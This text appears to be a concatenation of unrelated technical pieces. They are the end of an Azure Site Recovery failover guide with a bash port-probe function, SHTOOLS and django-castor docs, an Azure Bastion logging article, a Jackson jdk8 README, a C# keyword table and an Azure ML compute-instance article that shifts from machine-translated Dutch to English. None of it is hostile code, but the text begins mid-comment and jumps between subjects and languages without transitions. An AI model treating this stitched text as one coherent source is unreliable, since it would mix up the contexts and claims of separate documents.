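# endpoint of a failed-over Azure VM) accepts connections. Not Site Recovery tooling.
probe_endpoint() {
  host="$1"; port="$2"
  if timeout 5 bash -c "exec 3<>/dev/tcp/${host}/${port}" 2>/dev/null; then
    echo "reachable"
  else
    echo "not reachable"
  fi
}

# Example usage (replace with your failed-over VM's cloud service name):
# probe_endpoint myfailedovervm.cloudapp.net 3389
```

If the endpoint reports "not reachable", re-check the VM endpoint configuration and the firewall rules described in the connection steps that follow.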
### Connect to replicated Azure virtual machines after failover

In order to connect to replicated virtual machines in Azure after failover, here's what you'll need:

1. Remote Desktop connections should be enabled on the primary machine.
2. The Windows Firewall on the primary machine should allow RDP.
3. After failover you'll need to add RDP to the public endpoint for the Azure virtual machine. [Read more](http://social.technet.microsoft.com/wiki/contents/articles/31666.troubleshooting-remote-desktop-connection-after-failover-using-asr.aspx) about setting this up.

## Deploy additional process servers

If you have to scale out your deployment beyond 200 source machines, or your total daily churn rate exceeds 2 TB, you’ll need additional process servers to handle the traffic volume. To set up an additional process server, check the requirements in [Additional process servers](#additional-process-servers) and then follow the instructions here to set up the process server. After setting up the server you can configure source machines to use it.

### Set up an additional process server

You set up an additional process server as follows:

* Run the unified wizard to configure a management server as a process server only.
* If you want to manage data replication using only the new process server, you'll need to migrate your protected machines to it.

### Install the process server

1. On the Quick Start page download the unified installation file for the Site Recovery component installation. Run setup.
2. In **Before you begin** select **Add additional process servers to scale out deployment**.

   ![Add process server](./media/site-recovery-vmware-to-azure-classic/add-ps1.png)
3. Complete the wizard in the same way you did when you [set up](#step-5-install-the-management-server) the first management server.
4. In **Configuration Server Details** specify the IP address of the original management server on which you installed the configuration server, and the passphrase.
   On the original management server, run **<SiteRecoveryInstallationFolder>\home\svsystems\bin\genpassphrase.exe -n** to obtain the passphrase.

   ![Add process server](./media/site-recovery-vmware-to-azure-classic/add-ps2.png)

### Migrate machines to use the new process server

1. Open **Configuration Servers** > **Server** > name of the original management server > **Server Details**.

   ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server1.png)
2. In the **Process Servers** list click **Change Process Server** next to the server you want to modify.

   ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server2.png)
3. In **Change Process Server** > **Target Process Server** select the new management server, and then select the virtual machines that the new process server will handle. Click the information icon to get information about the server. The average space that's needed to replicate each selected virtual machine to the new process server is displayed, to help you make load decisions. Click the check mark to start replicating to the new process server.

   ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server3.png)

## VMware permissions for vCenter access

The process server can automatically discover VMs on a vCenter server. To perform automatic discovery you'll need to define a role (Azure_Site_Recovery) at the vCenter level to allow Site Recovery to access the vCenter server. Note that if you only need to migrate VMware machines to Azure and don't need to fail back from Azure, a read-only role is sufficient. You set up the permissions as described in [Step 6: Set up credentials for the vCenter server](#step-6-set-up-credentials-for-the-vcenter-server). The role permissions are summarized in the following table.
| **Role** | **Details** | **Permissions** |
| --- | --- | --- |
| Azure_Site_Recovery role |VMware VM discovery |Assign these privileges for the vCenter server:<br/><br/>Datastore -> Allocate space, Browse datastore, Low level file operations, Remove file, Update virtual machine files<br/><br/>Network -> Network assign<br/><br/>Resource -> Assign virtual machine to resource pool, Migrate powered off virtual machine, Migrate powered on virtual machine<br/><br/>Tasks -> Create task, Update task<br/><br/>Virtual machine -> Configuration<br/><br/>Virtual machine -> Interact -> Answer question, Device connection, Configure CD media, Configure floppy media, Power off, Power on, VMware tools install<br/><br/>Virtual machine -> Inventory -> Create, Register, Unregister<br/><br/>Virtual machine -> Provisioning -> Allow virtual machine download, Allow virtual machine files upload<br/><br/>Virtual machine -> Snapshots -> Remove snapshots |
| vCenter user role |VMware VM discovery/failover without shutdown of the source VM |Assign these privileges for the vCenter server:<br/><br/>Data center object -> Propagate to child object, role=Read-only<br/><br/>The user is assigned at the datacenter level, and thus has access to all the objects in the datacenter. If you want to restrict access, assign the **No access** role with the **Propagate to child object** option to the child objects (ESX hosts, datastores, VMs, and networks). |
| vCenter user role |Failover and failback |Assign these privileges for the vCenter server:<br/><br/>Datacenter object -> Propagate to child object, role=Azure_Site_Recovery<br/><br/>The user is assigned at the datacenter level, and thus has access to all the objects in the datacenter. If you want to restrict access, assign the **No access** role with the **Propagate to child object** option to the child objects (ESX hosts, datastores, VMs, and networks). |

## Third-party software notices and information

Do Not Translate or Localize

The software and firmware running in the Microsoft product or service is based on or incorporates material from the projects listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and license, under which Microsoft received such Third Party Code, are set forth below.

The information in Section A is regarding Third Party Code components from the projects listed below. Such licenses and information are provided for informational purposes only. This Third Party Code is being relicensed to you by Microsoft under Microsoft's software licensing terms for the Microsoft product or service.

The information in Section B is regarding Third Party Code components that are being made available to you by Microsoft under the original licensing terms.

The complete file may be found on the [Microsoft Download Center](http://go.microsoft.com/fwlink/?LinkId=529428). Microsoft reserves all rights not expressly granted herein, whether by implication, estoppel or otherwise.

## Next steps

[Learn more about failback](site-recovery-failback-azure-to-vmware-classic.md) to bring your failed-over machines running in Azure back to your on-premises environment.
# djpi2()

Compute the rotation matrix d(pi/2) used in rotating data expressed in spherical harmonics.

# Usage

dj = djpi2 (lmax)

# Returns

dj : float, dimension (lmax+1, lmax+1, lmax+1)
:   The rotation matrix dj(pi/2).

# Parameters

lmax : integer
:   The maximum spherical harmonic degree of the spherical harmonic rotation.

# Description

djpi2 will calculate the rotation matrix `d_{mM}^j (pi/2)` that is used in rotating spherical harmonics in the routines SHRotateRealCoef and SHRotateCoef. This routine is based on code originally written by Guy Masters.
# `django-castor`

`django-castor` is a re-usable app for Django which provides a **content-addressable storage backend**. The main class, `djcastor.storage.CAStorage`, is a type of `FileSystemStorage` which saves files under their SHA-1 digest.

* No matter how many times the same file is uploaded, it will only ever be stored once, thus eliminating redundancy.
* Filenames are pseudorandom and made up only of hexadecimal characters, so you don’t have to worry about filename collisions or sanitization.
* `django-castor` shards files in the uploads directory based on their digests; this prevents filesystem issues when too many files are in a single directory.

For more information on the CAS concept, see the [wikipedia page][].

[wikipedia page]: http://en.wikipedia.org/wiki/Content-addressable_storage

## Installation

    pip install django-castor
    # or
    easy_install django-castor

## Usage

Basic usage is as follows:

    from django.db import models
    from djcastor import CAStorage

    class MyModel(models.Model):
        ...
        uploaded_file = models.FileField(storage=CAStorage(), upload_to='uploads')

At the moment, Django requires a non-empty value for the `upload_to` parameter. Note that `CAStorage` will **not** use this value; if you need to customize the destination for uploaded files, use the `location` parameter (see below).

For extended usage, there are several options you can pass to the `CAStorage` constructor. The first two are inherited from the built-in `FileSystemStorage`:

* `location`: The absolute path to the directory that will hold uploaded files. If omitted, this will be set to the value of the `MEDIA_ROOT` setting.

* `base_url`: The URL that serves the files stored at this location. If omitted, this will be set to the value of the `MEDIA_URL` setting.

`CAStorage` also adds two custom options:

* `keep_extension` (default `True`): Preserve the extension on uploaded files. This allows the webserver to guess their `Content-Type`.

* `sharding` (default `(2, 2)`): The width and depth to use when sharding digests, expressed as a two-tuple. The following examples show how these parameters affect the sharding:

        >>> digest = '1f09d30c707d53f3d16c530dd73d70a6ce7596a9'
        >>> print shard(digest, width=2, depth=2)
        1f/09/1f09d30c707d53f3d16c530dd73d70a6ce7596a9
        >>> print shard(digest, width=2, depth=3)
        1f/09/d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9
        >>> print shard(digest, width=3, depth=2)
        1f0/9d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9

## Caveats

The first small caveat is that content-addressable storage is not suited to rapidly-changing content. If your website modifies the contents of file fields on a regular basis, it might be a better idea to use a UUID-based storage backend for those fields.

The second, more important caveat with this approach is that if the parent model of a file is deleted, the file will remain on disk. Because individual files may be referred to by more than one model, and `django-castor` has no awareness of these references, it leaves file deletion up to the developer.

For the most part, you can get away without deleting uploads. In fact, content-addressable storage is often used for long-term archival systems, where files are immutable and must be kept for future auditing (usually for compliance with government regulations). If disk space is at a premium and you need to delete uploads, there are two approaches you might want to take:

* Garbage collection: write a script that walks through the list of uploaded files and checks references to each one. If no references are found, delete the file.
* Reference counting: denormalize the `FileField` into a separate model, and keep a count of all the models pointing to it. Once this count reaches zero, delete the file from the filesystem.

## (Un)license

This is free and unencumbered software released into the public domain.

Anyone is free to copy, modify, publish, use, compile, sell, or distribute this software, either in source code form or as a compiled binary, for any purpose, commercial or non-commercial, and by any means.

In jurisdictions that recognize copyright laws, the author or authors of this software dedicate any and all copyright interest in the software to the public domain. We make this dedication for the benefit of the public at large and to the detriment of our heirs and successors. We intend this dedication to be an overt act of relinquishment in perpetuity of all present and future rights to this software under copyright law.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

For more information, please refer to <http://unlicense.org/>
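To make the digest-and-shard scheme described above concrete, here is a minimal, illustrative re-implementation of the `shard` helper used in the README's examples. This sketch only mirrors the observable behavior shown there; the real implementation lives inside `djcastor` and may differ in detail:

```python
import hashlib

def shard(digest, width=2, depth=2):
    """Split the first width*depth hex characters of the digest into
    path segments, then append the full digest as the filename.

    Illustrative re-implementation of django-castor's sharding scheme,
    not the actual djcastor code.
    """
    segments = [digest[i * width:(i + 1) * width] for i in range(depth)]
    segments.append(digest)
    return "/".join(segments)

# A file's storage path is derived from the SHA-1 of its content:
content = b"hello, world"
digest = hashlib.sha1(content).hexdigest()
print(shard(digest))

# The examples from the README, reproduced:
d = "1f09d30c707d53f3d16c530dd73d70a6ce7596a9"
print(shard(d, width=2, depth=2))  # 1f/09/1f09d30c707d53f3d16c530dd73d70a6ce7596a9
print(shard(d, width=2, depth=3))  # 1f/09/d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9
print(shard(d, width=3, depth=2))  # 1f0/9d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9
```

Because the path depends only on the content's digest, re-uploading the same bytes always resolves to the same path, which is exactly why duplicates are stored only once.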
Adapter for [Apache Geode](https://geode.apache.org/). It will typically generate [OQL](https://geode.apache.org/docs/guide/19/developing/querying_basics/query_basics.html) to query the cache.

The Geode adapter is currently a work in progress.
---
title: Enable and work with Azure Bastion resource logs
description: This article shows you how to enable and work with Azure Bastion diagnostic logs.
services: bastion
author: charwen
ms.service: bastion
ms.topic: how-to
ms.date: 02/03/2020
ms.author: charwen
---
# <a name="enable-and-work-with-bastion-resource-logs"></a>Enable and work with Bastion resource logs

As users connect to workloads using Azure Bastion, Bastion can log diagnostics of the remote sessions. You can then use the diagnostics to view which users connected to which workloads, at what time, from where, and other such relevant logging information. In order to use the diagnostics, you must enable diagnostic logs on Azure Bastion. This article helps you enable the diagnostic logs, and then view them.

## <a name="enable-the-resource-log"></a><a name="enable"></a>Enable the resource log

1. In the [Azure portal](https://portal.azure.com), navigate to your Azure Bastion resource and select **Diagnostic settings** from the Azure Bastion page.

    ![Screenshot that shows the "Diagnostic settings" page.](./media/diagnostic-logs/1diagnostics-settings.png)
2. Select **Diagnostic settings**, then select **+ Add diagnostic setting** to add a destination for the logs.

    ![Screenshot that shows the "Diagnostic settings" page with the "Add diagnostic setting" button selected.](./media/diagnostic-logs/2add-diagnostic-setting.png)
3. On the **Diagnostic settings** page, select the type of storage account to use to store the diagnostic logs.

    ![Screenshot of the "Diagnostic settings" page with the section for selecting a storage location highlighted.](./media/diagnostic-logs/3add-storage-account.png)
4. When you finish the settings, it should look similar to this example:

    ![Example settings](./media/diagnostic-logs/4example-settings.png)

## <a name="view-diagnostics-log"></a><a name="view"></a>View diagnostic logs

To access your diagnostic logs, you can directly use the storage account that you specified while enabling the diagnostic settings.

1. Navigate to your storage account resource, and then to **Containers**. You see the **insights-logs-bastionauditlogs** blob created in your storage account's blob container.

    ![Diagnostic settings](./media/diagnostic-logs/1-navigate-to-logs.png)
2. As you navigate inside the container, you see various folders in your blob. These folders indicate the resource hierarchy for your Azure Bastion resource.

    ![Add diagnostic setting](./media/diagnostic-logs/2-resource-h.png)
3. Navigate to the full hierarchy of the Azure Bastion resource whose diagnostic logs you want to access/view. The 'y=', 'm=', 'd=', 'h=', and 'm=' segments indicate the year, month, day, hour, and minute, respectively, for the resource logs.

    ![Select the storage location](./media/diagnostic-logs/3-resource-location.png)
4. Locate the JSON file created by Azure Bastion that contains the diagnostic log data for the time period you navigated to.
5. Download the JSON file from your storage blob container.

    The following is a sample entry from the JSON file, for reference:

    ```json
    {
       "time":"2019-10-03T16:03:34.776Z",
       "resourceId":"/SUBSCRIPTIONS/<subscripionID>/RESOURCEGROUPS/MYBASTION/PROVIDERS/MICROSOFT.NETWORK/BASTIONHOSTS/MYBASTION-BASTION",
       "operationName":"Microsoft.Network/BastionHost/connect",
       "category":"BastionAuditLogs",
       "level":"Informational",
       "location":"eastus",
       "properties":{
          "userName":"<username>",
          "userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
          "clientIpAddress":"131.107.159.86",
          "clientPort":24039,
          "protocol":"ssh",
          "targetResourceId":"/SUBSCRIPTIONS/<subscripionID>/RESOURCEGROUPS/MYBASTION/PROVIDERS/MICROSOFT.COMPUTE/VIRTUALMACHINES/LINUX-KEY",
          "subscriptionId":"<subscripionID>",
          "message":"Successfully Connected.",
          "resourceType":"VM",
          "targetVMIPAddress":"172.16.1.5",
          "tunnelId":"<tunnelID>"
       },
       "FluentdIngestTimestamp":"2019-10-03T16:03:34.0000000Z",
       "Region":"eastus",
       "CustomerSubscriptionId":"<subscripionID>"
    }
    ```

## <a name="next-steps"></a>Next steps

Read the [Bastion FAQ](bastion-faq.md).
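Once the JSON log file is downloaded, its entries can be summarized with a short script. The following is a minimal sketch, assuming one JSON record per line (blob diagnostic logs are commonly newline-delimited); the helper name and the trimmed-down sample record are illustrative, using only the fields shown in the sample entry above:

```python
import json

def summarize_bastion_sessions(log_lines):
    """Return (user, client IP, protocol, message) tuples from Bastion audit records.

    Each element of log_lines is one JSON-encoded record, shaped like the
    sample entry above. Records of other categories are skipped.
    """
    sessions = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        if record.get("category") != "BastionAuditLogs":
            continue
        props = record.get("properties", {})
        sessions.append((
            props.get("userName"),
            props.get("clientIpAddress"),
            props.get("protocol"),
            props.get("message"),
        ))
    return sessions

# Example with a trimmed-down, illustrative record:
sample = json.dumps({
    "category": "BastionAuditLogs",
    "properties": {
        "userName": "alice",
        "clientIpAddress": "131.107.159.86",
        "protocol": "ssh",
        "message": "Successfully Connected.",
    },
})
print(summarize_bastion_sessions([sample]))
```

In practice you would pass the lines of the downloaded file, for example `summarize_bastion_sessions(open("PT1H.json"))`, where the file name depends on the time range you navigated to.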
# pole

[![Docker Build Status](https://img.shields.io/docker/cloud/build/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/builds/) [![MicroBadger Size](https://img.shields.io/microbadger/image-size/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/tags/) [![Docker Pulls](https://img.shields.io/docker/pulls/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/)

Docker image hosting a Neo4j database of POLE data. POLE stands for People, Objects, Locations and Events; POLE databases are typically used in police/intelligence use cases.

## Credits

- **Jesús Barrasa** for publishing the [POLE dataset](https://github.com/jbarrasa/datasets/tree/master/safeguarding) and the descriptive [guide](http://guides.neo4j.com/field/pole.html).
# L. Jiang's Wiki

Repo: [https://github.com/ismdeep/public-doc](https://github.com/ismdeep/public-doc)

HOME: [http://65.49.216.71:8090/](http://65.49.216.71:8090/)
## TODO

- [ ] `fronts-webpack` - 2.10
- [ ] `fronts-vite` - 2.10
- [ ] `fronts-sandbox` - 2.10
- [ ] `fronts-html` - 2.10
- [ ] `fronts-vue` - 2.10
- [ ] `fronts-ng`
- [ ] UT/IT/E2E
- [ ] Doc for API
- [ ] Support static `import` for version control
- [ ] Refactor `import()` for version control
- [ ] `fronts-svelte`
- [ ] `fronts-solid`
- [ ] `fronts-builder`
- [ ] `fronts-cli`
- [ ] `fronts-c4`
- [ ] `fronts-ssr`
- [ ] `fronts-registry` with `semver` for version control
- [ ] `fronts-vscode-toolkit`
- [ ] `fronts-extension`
- [ ] `fronts-logger`
- [ ] Building tools CLI
- [ ] Error handling/Fallback
- [ ] Logger/Debugger/Testing tools
Jackson module that adds support for JDK datatypes included in version 8 which cannot be directly supported by core databind due to the baseline being JDK 6, excluding the following:

* New Date/Time datatypes (supported by the `jackson-datatype-jsr310` module)
* Support for parameter names (supported by `jackson-module-parameter-names`)

NOTE: only available for Jackson 2.x; the functionality is included in `jackson-databind` itself for Jackson 3.x.

## Usage

### Maven dependency

To use the module in Maven-based projects, use the following dependency:

```xml
<dependency>
  <groupId>com.fasterxml.jackson.datatype</groupId>
  <artifactId>jackson-datatype-jdk8</artifactId>
  <version>2.12.2</version>
</dependency>
```

(or whatever version is most up-to-date at the moment)

### Registering module

Like all standard Jackson modules (libraries that implement the Module interface), registration is done as follows:

```java
ObjectMapper mapper = new ObjectMapper();
mapper.registerModule(new Jdk8Module());

// Or, the more fluent version:
ObjectMapper mapper = new ObjectMapper().registerModule(new Jdk8Module());
```

after which functionality is available for all normal Jackson operations: you can read JSON into supported JDK8 types, as well as write values of such types as JSON, so that for example:

```java
class Contact {
    private final String name;
    private final Optional<String> email;

    public Contact(String name, Optional<String> email) {
        this.name = name;
        this.email = email;
    }

    public String getName() { return name; }

    public Optional<String> getEmail() { return email; }
}

...

Contact nullEmail = new Contact("Example Co.", null);
String nullEmailJson = mapper.writeValueAsString(nullEmail);
// prints: {"name":"Example Co.","email":null}
System.out.println(nullEmailJson);

Contact emptyEmail = new Contact("Example Co.", Optional.empty());
String emptyEmailJson = mapper.writeValueAsString(emptyEmail);
// prints: {"name":"Example Co.","email":null}
System.out.println(emptyEmailJson);

Contact withEmail = new Contact("Example Co.", Optional.of("info@example.com"));
String withEmailJson = mapper.writeValueAsString(withEmail);
// prints: {"name":"Example Co.","email":"info@example.com"}
System.out.println(withEmailJson);
```
---
title: Contextual keywords - C# Reference
ms.custom: seodec18
ms.date: 03/07/2017
helpviewer_keywords:
- contextual keywords [C#]
ms.assetid: 7c76bc29-a754-4389-b0ab-f6b441018298
---
# <a name="contextual-keywords-c-reference"></a>Contextual keywords (C# Reference)

A contextual keyword is used to provide a specific meaning in the code, but it is not a reserved word in C#. This section introduces the following contextual keywords:

|Keyword|Description|
|-------------|-----------------|
|[add](../../../csharp/language-reference/keywords/add.md)|Defines a custom event accessor that is invoked when client code subscribes to the event.|
|[async](../../../csharp/language-reference/keywords/async.md)|Indicates that the modified method, lambda expression, or anonymous method is asynchronous.|
|[await](../../../csharp/language-reference/keywords/await.md)|Suspends an async method until an awaited task is completed.|
|[dynamic](../../../csharp/language-reference/keywords/dynamic.md)|Defines a reference type that enables the operations in which it occurs to bypass compile-time type checking.|
|[get](../../../csharp/language-reference/keywords/get.md)|Defines an accessor method for a property or an indexer.|
|[global](../../../csharp/language-reference/keywords/global.md)|Specifies the default global namespace, which is otherwise unnamed.|
|[partial](../../../csharp/language-reference/keywords/partial-type.md)|Defines partial classes, structs, and interfaces throughout the same compilation unit.|
|[remove](../../../csharp/language-reference/keywords/remove.md)|Defines a custom event accessor that is invoked when client code unsubscribes from the event.|
|[set](../../../csharp/language-reference/keywords/set.md)|Defines an accessor method for a property or an indexer.|
|[value](../../../csharp/language-reference/keywords/value.md)|Used to set accessors and to add or remove event handlers.|
|[var](../../../csharp/language-reference/keywords/var.md)|Enables the type of a variable declared at method scope to be determined by the compiler.|
|[when](when.md)|Specifies a filter condition for a `catch` block or the `case` label of a `switch` statement.|
|[where](../../../csharp/language-reference/keywords/where-generic-type-constraint.md)|Adds constraints to a generic declaration. (See also [where](../../../csharp/language-reference/keywords/where-clause.md).)|
|[yield](../../../csharp/language-reference/keywords/yield.md)|Used in an iterator block to return a value to the enumerator object or to signal the end of iteration.|

All query keywords introduced in C# 3.0 are also contextual. For more information, see [Query keywords (LINQ)](../../../csharp/language-reference/keywords/query-keywords.md).

## <a name="see-also"></a>See also

- [C# Reference](../../../csharp/language-reference/index.md)
- [C# Programming Guide](../../../csharp/programming-guide/index.md)
- [C# Keywords](../../../csharp/language-reference/keywords/index.md)
--- title: Wat is een Azure Machine Learning-rekeninstantie? titleSuffix: Azure Machine Learning description: Meer informatie over de Azure Machine Learning Compute-instantie, een volledig beheerd werk station in de Cloud. services: machine-learning ms.service: machine-learning ms.subservice: core ms.topic: conceptual ms.author: sgilley author: sdgilley ms.date: 08/25/2020 ms.openlocfilehash: 14229af9766f6604e71713f835935d43f6c7fcc6 ms.sourcegitcommit: 32c521a2ef396d121e71ba682e098092ac673b30 ms.translationtype: MT ms.contentlocale: nl-NL ms.lasthandoff: 09/25/2020 ms.locfileid: "91330142" --- # <a name="what-is-an-azure-machine-learning-compute-instance"></a>Wat is een Azure Machine Learning-rekeninstantie? Een Azure Machine Learning Compute-instantie is een beheerd werk station in de Cloud voor gegevens wetenschappers. Reken instanties maken het eenvoudig om aan de slag te gaan met Azure Machine Learning-ontwikkeling en bieden mogelijkheden voor het beheer en de bedrijfs voorbereiding voor IT-beheerders. Gebruik een reken instantie als uw volledig geconfigureerde en beheerde ontwikkel omgeving in de Cloud voor machine learning. Ze kunnen ook worden gebruikt als een reken doel voor training en demijnen voor ontwikkelings-en test doeleinden. Gebruik een [Azure machine learning Compute-Cluster](how-to-create-attach-compute-sdk.md#amlcompute) met mogelijkheden voor schalen op meerdere knoop punten voor de training van productie-kwaliteits modellen. Gebruik [Azure Kubernetes service-cluster](how-to-deploy-azure-kubernetes-service.md)voor productie kwaliteit van het model. ## <a name="why-use-a-compute-instance"></a>Waarom een reken instantie gebruiken? Een reken instantie is een volledig beheerd, op de cloud gebaseerd werk station dat is geoptimaliseerd voor uw machine learning-ontwikkel omgeving. 
Het biedt de volgende voor delen: |Belangrijkste voordelen|Beschrijving| |----|----| |Productiviteit|U kunt modellen bouwen en implementeren met behulp van geïntegreerde notebooks en de volgende hulpprogram ma's in Azure Machine Learning studio:<br/>-Jupyter<br/>-Jjupyterlab<br/>-RStudio (preview-versie)<br/>Reken instantie is volledig geïntegreerd met Azure Machine Learning werk ruimte en Studio. U kunt notitie blokken en gegevens delen met andere gegevens wetenschappers in de werk ruimte. U kunt ook met [SSH](how-to-set-up-vs-code-remote.md) externe ontwikkeling met behulp van code instellen | |Beheerde & beveiligd|Verminder uw beveiligings footprint en voeg naleving toe met beveiligings vereisten voor ondernemingen. Reken instanties bieden robuust beheer beleid en beveiligde netwerk configuraties zoals:<br/><br/>-Autoinrichting van Resource Manager-sjablonen of Azure Machine Learning SDK<br/>- [Op rollen gebaseerd toegangs beheer op basis van Azure (Azure RBAC)](/azure/role-based-access-control/overview)<br/>- [Ondersteuning voor virtuele netwerken](how-to-enable-virtual-network.md#compute-instance)<br/>-SSH-beleid voor het inschakelen/uitschakelen van SSH-toegang<br/>TLS 1,2 ingeschakeld | |Vooraf geconfigureerd &nbsp; voor &nbsp; ml|Bespaar tijd bij het instellen van taken met vooraf geconfigureerde en up-to-date ML-pakketten, diepe leer frameworks, GPU-Stuur Programma's.| |Volledig aanpasbaar|Uitgebreide ondersteuning voor Azure VM-typen, waaronder Gpu's en persistente aanpassing op laag niveau, zoals het installeren van pakketten en stuur Programma's, maakt een koud probleem van geavanceerde scenario's. | ## <a name="tools-and-environments"></a><a name="contents"></a>Hulpprogram ma's en omgevingen > [!IMPORTANT] > Items die zijn gemarkeerd (preview) in dit artikel zijn momenteel beschikbaar als open bare preview. > De preview-versie wordt aangeboden zonder Service Level Agreement en wordt niet aanbevolen voor productieworkloads. 
Misschien worden bepaalde functies niet ondersteund of zijn de mogelijkheden ervan beperkt. Zie [Supplemental Terms of Use for Microsoft Azure Previews (Aanvullende gebruiksvoorwaarden voor Microsoft Azure-previews)](https://azure.microsoft.com/support/legal/preview-supplemental-terms/) voor meer informatie. Met Azure Machine Learning Compute-instantie kunt u modellen ontwerpen, trainen en implementeren in een volledig geïntegreerde laptop ervaring in uw werk ruimte. Deze hulpprogram ma's en omgevingen zijn geïnstalleerd op het reken exemplaar: |Algemene hulpprogram ma's & omgevingen|Details| |----|:----:| |Stuurprogramma's|`CUDA`</br>`cuDNN`</br>`NVIDIA`</br>`Blob FUSE` | |Intel MPI-bibliotheek|| |Azure CLI || |Azure Machine Learning-voor beelden || |Docker|| |Nginx|| |NCCL 2,0 || |Protobuf|| |**R** -hulpprogram ma's & omgevingen|Details| |----|:----:| |RStudio server open source Edition (preview-versie)|| |R-kernel|| |Azure Machine Learning SDK voor R|[azuremlsdk](https://azure.github.io/azureml-sdk-for-r/reference/index.html)</br>SDK steekproeven| |**PYTHON** -hulpprogram ma's & omgevingen|Details| |----|----| |Anaconda Python|| |Jupyter en-extensies|| |Jjupyterlab en-extensies|| [Azure Machine Learning-SDK voor Python](https://docs.microsoft.com/python/api/overview/azure/ml/intro?view=azure-ml-py&preserve-view=true)</br>van PyPI|Omvat het meren deel van de extra azureml-pakketten. 
Als u de volledige lijst wilt weer geven, [opent u een Terminal venster op uw reken exemplaar](how-to-run-jupyter-notebooks.md#terminal) en voert u uit <br/> `conda list -n azureml_py36 azureml*` | |Andere PyPI-pakketten|`jupytext`</br>`tensorboard`</br>`nbconvert`</br>`notebook`</br>`Pillow`| |Conda-pakketten|`cython`</br>`numpy`</br>`ipykernel`</br>`scikit-learn`</br>`matplotlib`</br>`tqdm`</br>`joblib`</br>`nodejs`</br>`nb_conda_kernels`| |Uitgebreide leer pakketten|`PyTorch`</br>`TensorFlow`</br>`Keras`</br>`Horovod`</br>`MLFlow`</br>`pandas-ml`</br>`scrapbook`| |ONNX-pakketten|`keras2onnx`</br>`onnx`</br>`onnxconverter-common`</br>`skl2onnx`</br>`onnxmltools`| |Azure Machine Learning python & R SDK-voor beelden|| Python-pakketten zijn allemaal geïnstalleerd in de **Python 3,6-AzureML-** omgeving. ### <a name="installing-packages"></a>Pakketten installeren U kunt pakketten rechtstreeks installeren in Jupyter Notebook of RStudio: * RStudio gebruik het tabblad **pakketten** aan de rechter kant of op het tabblad **console** linksboven. * Python: Voeg een installatie code toe en voer deze uit in een Jupyter Notebook-cel. Of u kunt op een van de volgende manieren toegang krijgen tot een Terminal venster: * RStudio: Selecteer het tabblad **Terminal** aan de rechter bovenhoek. * Jupyter Lab: Selecteer de tegel **Terminal** onder de **andere** kop op het tabblad Start. * Jupyter: Selecteer **nieuwe>Terminal** rechtsboven op het tabblad bestanden. * SSH naar de computer. Installeer Python-pakketten vervolgens in de **Python 3,6-AzureML-** omgeving. R-pakketten installeren in de **R** -omgeving. ### <a name="add-new-kernels"></a>Nieuwe kernels toevoegen Een nieuwe Jupyter-kernel toevoegen aan het reken exemplaar: 1. Nieuwe terminal maken van het deel venster Jupyter, Jjupyterlab of van notitie blokken of SSH in het reken exemplaar 2. Gebruik het Terminal venster om een nieuwe omgeving te maken. 
    For example, the code below creates `newenv`:

    ```shell
    conda create --name newenv
    ```

3. Activate the environment. For example, after creating `newenv`:

    ```shell
    conda activate newenv
    ```

4. Install pip and the ipykernel package in the new environment, and create a kernel for that conda env:

    ```shell
    conda install pip
    conda install ipykernel
    python -m ipykernel install --user --name newenv --display-name "Python (newenv)"
    ```

Any of the [available Jupyter kernels](https://github.com/jupyter/jupyter/wiki/Jupyter-kernels) can be installed.

## <a name="accessing-files"></a>Accessing files

Notebooks and R scripts are stored in the default storage account of your workspace, in an Azure file share. These files are located under your user files directory. This storage makes it easy to share notebooks between compute instances. The storage account also keeps your notebooks safely preserved when you stop or delete a compute instance.

The Azure file share account of your workspace is mounted as a drive on the compute instance. This drive is the default working directory for Jupyter, Jupyter Labs, and RStudio. This means that the notebooks and other files you create in Jupyter, JupyterLab, or RStudio are automatically stored on the file share and available for use on other compute instances as well.

The files in the file share are accessible from all compute instances in the same workspace. Any changes to these files on the compute instance are reliably persisted back to the file share. You can also clone the latest Azure Machine Learning samples to your folder under the user files directory in the workspace file share.

Writing small files can be slower on network drives than writing to the local disk of the compute instance itself.
If you are writing many small files, consider using a directory directly on the compute instance, such as a `/tmp` directory. Note that these files will not be accessible from other compute instances.

You can use the `/tmp` directory on the compute instance for your temporary data. However, do not write large data files to the OS disk of the compute instance. Use [datastores](concept-azure-machine-learning-architecture.md#datasets-and-datastores) instead. If you have installed the JupyterLab Git extension, it can also lead to slow compute instance performance.

## <a name="managing-a-compute-instance"></a>Managing a compute instance

In your workspace in Azure Machine Learning studio, select **Compute**, then select **Compute instance** at the top.

![Manage a compute instance](./media/concept-compute-instance/manage-compute-instance.png)

You can perform the following actions:

* [Create a compute instance](#create).
* Refresh the compute instances tab.
* Start, stop, and restart a compute instance. You do pay for the instance whenever it is running. Stop the compute instance when you are not using it to reduce cost. Stopping a compute instance deallocates it. Then start it again when you need it.
* Delete a compute instance.
* Filter the list of compute instances to show only those you have created.

For each compute instance in your workspace that you can use, you can:

* Access Jupyter, JupyterLab, and RStudio on the compute instance
